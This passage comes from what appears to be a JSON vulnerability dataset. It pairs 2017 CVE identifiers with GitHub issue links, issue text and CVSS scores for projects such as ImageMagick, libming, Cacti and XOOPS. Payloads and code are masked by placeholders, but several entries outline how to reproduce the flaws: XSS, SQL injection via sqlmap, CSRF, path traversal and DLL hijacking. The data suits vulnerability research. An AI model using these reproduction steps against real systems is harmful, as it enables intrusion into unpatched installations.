        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11639",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/588",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/588",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-19T02:30:29Z",
        "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG output.cip Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11640",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/584",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/584",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-18T16:43:37Z",
        "description": "Address Access Except in APITAG coders/tiff.c. Crash Link : URLTAG Trigger Command : ./magick convert APITAG APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11644",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/587",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/587",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-18T18:33:59Z",
        "description": "Memory Leak in APITAG coders/mat.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG /dev/null Memory Leak Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11677",
        "Issue_Url_old": "https://github.com/curlyboi/hashtopus/issues/63",
        "Issue_Url_new": "https://github.com/curlyboi/hashtopus/issues/63",
        "Repo_new": "curlyboi/hashtopus",
        "Issue_Created_At": "2017-07-26T13:55:39Z",
        "description": "Hashtopus NUMBERTAG Multiple Vulnerabilities. SQL Injection (authenticated) A SQL Injection is present in FILETAG on line NUMBERTAG CODETAG APITAG of concept:_ CODETAG Reflective XSS (unauthenticated) An unauthenticated reflective cross site scripting is present on line NUMBERTAG in APITAG APITAG APITAG of concept:_ APITAG CSRF APITAG admin password to login) Cross site request forgery protection is not available on sensitive forms. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11680",
        "Issue_Url_old": "https://github.com/s3inlc/hashtopussy/issues/241",
        "Issue_Url_new": "https://github.com/hashtopolis/server/issues/241",
        "Repo_new": "hashtopolis/server",
        "Issue_Created_At": "2017-07-26T14:08:38Z",
        "description": "APITAG NUMBERTAG Multiple Vulnerabilities. CSRF APITAG Password Change) Cross site request forgery protection is not available on sensitive forms. In the following example is possible to change the admin password: CODETAG Weak ACL Some pages and functionalities were not configured with a proper ACL. It was possible to perform the following actions as user role NUMBERTAG Add voucher Delete voucher Add new agent using the generated voucher Create new hashcat release APITAG vulnerable to Stored XSS affecting all users and roles) Delete new hashcat release The following APITAG can be used to create a new voucher with user role. Afterwards on PATHTAG is possible to show all the available vouchers. CODETAG Stored XSS APITAG by any user or role) By taking advantage of the already discussed APITAG ACL\" issue, a user would be able to create a new Hashcat Release. The XSS is triggered inside FILETAG on the following parameters: version, url and rootdir. The following APITAG is available: ERRORTAG A stored XSS, readable by any role, may trigger a privilege escalation if executed by an administrative role. Open redirect (only with valid credentials) An informational issue for the developer: It was possible to fully control the APITAG response header during the login process, to force the session to be redirected to a third party website. The following request will forward the session to Google: CODETAG Reflective XSS (affecting only authenticated users) Some reflective XSS were identified in CODETAG APITAG APITAG &page NUMBERTAG Stored XSS APITAG affecting user's session) This XSS can be triggered by adding a new notification. This attack is stored, but only readable by current user (who created it basically). The following APITAG if available: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11691",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/867",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/867",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-07-20T07:45:55Z",
        "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG From this issue : URLTAG , the Cacti vendor has published the latest NUMBERTAG to fix two XSS vuls. But I just found a new xss vul in NUMBERTAG plz donnt say its the same issue or ask why is there a new CVE number? Because it's a real vul in the latest NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers NUMBERTAG Request with the special crafted referer header: APITAG APITAG NUMBERTAG Click the APITAG button in the bottom of the page like this: FILETAG NUMBERTAG ss alert. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-11692",
        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/519",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/519",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2017-07-28T03:56:49Z",
        "description": "The assert can lead to dos.. The assert code URLTAG can lead to a dos attack. Trigger: APITAG crash: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11703",
        "Issue_Url_old": "https://github.com/libming/libming/issues/72",
        "Issue_Url_new": "https://github.com/libming/libming/issues/72",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-07T14:55:00Z",
        "description": "memory leak in APITAG . On libming latest version, a memory leak was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11704",
        "Issue_Url_old": "https://github.com/libming/libming/issues/76",
        "Issue_Url_new": "https://github.com/libming/libming/issues/76",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:27:53Z",
        "description": "heap buffer overflow in APITAG On libming latest version, a heap buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11705",
        "Issue_Url_old": "https://github.com/libming/libming/issues/71",
        "Issue_Url_new": "https://github.com/libming/libming/issues/71",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-07T14:54:04Z",
        "description": "memory leak in APITAG On libming latest version, a memory leak was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11723",
        "Issue_Url_old": "https://github.com/JojoCMS/Jojo-CMS/issues/30",
        "Issue_Url_new": "https://github.com/jojocms/jojo-cms/issues/30",
        "Repo_new": "jojocms/jojo-cms",
        "Issue_Created_At": "2017-07-27T08:02:21Z",
        "description": "a path travel vuln in jojocms . there is a path travel vuln that can delect any folder on the server, and it can be done by an unauthorized remote attacker Code PATHTAG line NUMBERTAG ERRORTAG the para $_GET FILETAG after the post FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11724",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/624",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/624",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-27T15:07:41Z",
        "description": "Memory Leak in APITAG NUMBERTAG APITAG Memory Leak File Link : FILETAG Trigger Command : ./convert Memory Leak APITAG FILETAG Leak Detail : PATHTAG ./convert Memory Leak APITAG FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG a ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11728",
        "Issue_Url_old": "https://github.com/libming/libming/issues/82",
        "Issue_Url_new": "https://github.com/libming/libming/issues/82",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:35:58Z",
        "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11729",
        "Issue_Url_old": "https://github.com/libming/libming/issues/79",
        "Issue_Url_new": "https://github.com/libming/libming/issues/79",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:32:14Z",
        "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11730",
        "Issue_Url_old": "https://github.com/libming/libming/issues/81",
        "Issue_Url_new": "https://github.com/libming/libming/issues/81",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:34:13Z",
        "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11731",
        "Issue_Url_old": "https://github.com/libming/libming/issues/84",
        "Issue_Url_new": "https://github.com/libming/libming/issues/84",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:37:37Z",
        "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11732",
        "Issue_Url_old": "https://github.com/libming/libming/issues/80",
        "Issue_Url_new": "https://github.com/libming/libming/issues/80",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:33:06Z",
        "description": "heap buffer overflow in dcputs . On libming latest version, a heap buffer overflow was found in function dcputs . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11733",
        "Issue_Url_old": "https://github.com/libming/libming/issues/78",
        "Issue_Url_new": "https://github.com/libming/libming/issues/78",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:30:19Z",
        "description": "null pointer dereference in stackswap . On libming latest version, a null pointer dereference read was found in function stackswap . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11734",
        "Issue_Url_old": "https://github.com/libming/libming/issues/83",
        "Issue_Url_new": "https://github.com/libming/libming/issues/83",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-08T16:36:52Z",
        "description": "heap buffer overflow in APITAG . On libming latest version, a heap buffer overflow was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11736",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/304",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/304",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-07-29T07:51:29Z",
        "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG Needs an account of normal user with edit module permissions. in PATHTAG get tags parameter: APITAG call APITAG or APITAG with tags: APITAG in APITAG or APITAG CODETAG call APITAG without APITAG the tag parameter. cause sql injection to exploit NUMBERTAG login with edit module permissions NUMBERTAG get the post request of edit module. APITAG NUMBERTAG send it to sqlmap tool FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11737",
        "Issue_Url_old": "https://github.com/vstakhov/rspamd/issues/1738",
        "Issue_Url_new": "https://github.com/rspamd/rspamd/issues/1738",
        "Repo_new": "rspamd/rspamd",
        "Issue_Created_At": "2017-07-08T20:15:01Z",
        "description": "APITAG js executed in history page. Classification APITAG choose one option): [ ] PATHTAG loss [x] APITAG [ ] Serious bug [ ] Other bug [ ] Feature [ ] Enhancement Reproducibility APITAG choose one option): [X] Always [ ] Sometimes [ ] Rarely [ ] Unable [ ] I didn\u2019t try [ ] Not applicable Rspamd version NUMBERTAG Operation system, CPU, memory and environment: Description APITAG provide a descriptive summary of the issue): It seams that that the webui does not handle subjects correctly and executes javascript. Maybe other columns are affected also. Compile errors (if any): Steps to reproduce: Send mail with APITAG in subject. Expected results: Show subject Actual results: Alertbox pops up, no subjects shown Debugging information (see details [here URLTAG : Configuration: Additional information:",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11742",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/82",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/82",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2017-07-14T20:08:55Z",
        "description": "Windows APITAG DLL hijacking vulnerability. Starting with NUMBERTAG libexpat added a APITAG call to load the APITAG Windows system DLL to improve random numbers. This call however is prone to a known FILETAG , with no (trivial) way to opt out from this by apps making use of libexpat. The attack works by building a tailor made APITAG that exports the function required and called by libexpat, and copying that DLL to the directory of the user application or to the current directory. My (already proposed in URLTAG patch is this: CODETAG It will resolve the problem for Windows Vista and newer versions, thus covering all officially supported Windows versions. For older versions the generally recommended method is to detect APITAG directory and prepend that to the loaded DLL name.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11744",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13564",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13564",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2017-07-30T12:15:21Z",
        "description": "Stored XSS in MOD NUMBERTAG System Settings module. Summary I found two stored XSS in MOD NUMBERTAG System Settings APITAG \"key\" and \"name\" parameters in the following request are vulnerable to XSS vulnerability. This malicious payload will be trigerred by every user, when they visit this module. Step to reproduce Example request, which creates new setting with malicious $key and malicious $name: CODETAG Observed behavior A small popup will come up. APITAG FILETAG Environment MOD NUMBERTAG apache NUMBERTAG mysql NUMBERTAG php NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11746",
        "Issue_Url_old": "https://github.com/inversepath/tenshi/issues/6",
        "Issue_Url_new": "https://github.com/f-secure-foundry/tenshi/issues/6",
        "Repo_new": "f-secure-foundry/tenshi",
        "Issue_Created_At": "2017-07-28T19:00:39Z",
        "description": "Tenshi should create its PID file before dropping privileges. As part of the recent APITAG init script changes, I found the following vulnerability regarding signal handling. Basically, tenshi should creates its PID file before it drops privileges to a restricted user (say, the _tenshi_ user). Why? Well, imagine what you might like to do with the PID of the tenshi process: send a signal to the daemon! But if the PID file is created as the _tenshi_ user, then the _tenshi_ user can replace what's in the PID file with e.g. APITAG . Now, any attempt to stop tenshi will instead stop PID NUMBERTAG and reboot the system. To prevent that, the PID file should be created as root. After this change is made, I'll need to fix the init script once more to make sure that the restricted user can't write to the _directory_ containing its PID file (for the same reasons). From a quick glance, it looks like the other init scripts have the same problem.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11747",
        "Issue_Url_old": "https://github.com/tinyproxy/tinyproxy/issues/106",
        "Issue_Url_new": "https://github.com/tinyproxy/tinyproxy/issues/106",
        "Repo_new": "tinyproxy/tinyproxy",
        "Issue_Created_At": "2017-07-28T21:25:54Z",
        "description": "tinyproxy should create its PID file before dropping privileges. Summary The tinyproxy daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non root user, then he can replace its contents with the PID of a root process. Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non root user (a vulnerability). This is commonly exploitable by init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11750",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/632",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/632",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-30T07:34:09Z",
        "description": "Null pointer Dereference in APITAG APITAG URL: FILETAG Version: APITAG NUMBERTAG Q NUMBERTAG Trigger Command: ./magick convert SEGV APITAG output.aai Crash Detail: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f1fd0f1cde7 bp NUMBERTAG ffdf NUMBERTAG ad5c0 sp NUMBERTAG ffdf NUMBERTAG ad NUMBERTAG T NUMBERTAG f1fd0f1cde6 in APITAG APITAG NUMBERTAG f1fd0f1f NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0f NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG cc in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG ed in APITAG APITAG NUMBERTAG f1fd NUMBERTAG de in APITAG APITAG NUMBERTAG f1fd NUMBERTAG bae in APITAG APITAG NUMBERTAG e9 in APITAG APITAG NUMBERTAG f1fcfcdba3f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11751",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/631",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/631",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-30T07:13:53Z",
        "description": "Memory Leak in APITAG APITAG URL: FILETAG Trigger Command: ./magick convert Memory Leak NUMBERTAG output_picon NUMBERTAG APITAG APITAG NUMBERTAG Q NUMBERTAG Crash Detail: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d5a9aa in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d5cb5 in APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11752",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/628",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/628",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-29T11:29:45Z",
        "description": "Memory Leak in in APITAG APITAG Poc link : URLTAG Trigger Command\uff1a APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11753",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/629",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/629",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-29T12:09:40Z",
        "description": "Heap buffer overflow in APITAG APITAG Poc link: FILETAG Trigger Command\uff1a APITAG APITAG output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11754",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/633",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/633",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-30T11:13:07Z",
        "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11755",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/634",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/634",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-30T11:17:53Z",
        "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12065",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/877",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/877",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-07-26T07:53:03Z",
        "description": "some vulns found in.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12138",
        "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/523",
        "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/523",
        "Repo_new": "xoops/xoopscore25",
        "Issue_Created_At": "2017-07-18T15:08:59Z",
        "description": "url redirect vulnerability in xoops NUMBERTAG There is a url redirect vulnerability in PATHTAG line NUMBERTAG FILETAG When xoops_redirect is not a full https url, the defence will be bypassed. POC: FILETAG This will cause to redirect to yahoo as follow: FILETAG Discoverer: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12139",
        "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/524",
        "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/524",
        "Repo_new": "xoops/xoopscore25",
        "Issue_Created_At": "2017-07-18T15:19:15Z",
        "description": "stored xss in XOOPS NUMBERTAG There is a stored xss in FILETAG . Here is the critical code: FILETAG After the file is uploaded, some information about the file will be writed to the database. image_mimetype with value from $uploader APITAG will be writed . FILETAG $uploader APITAG is finally from the",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12140",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/533",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/533",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-29T14:36:38Z",
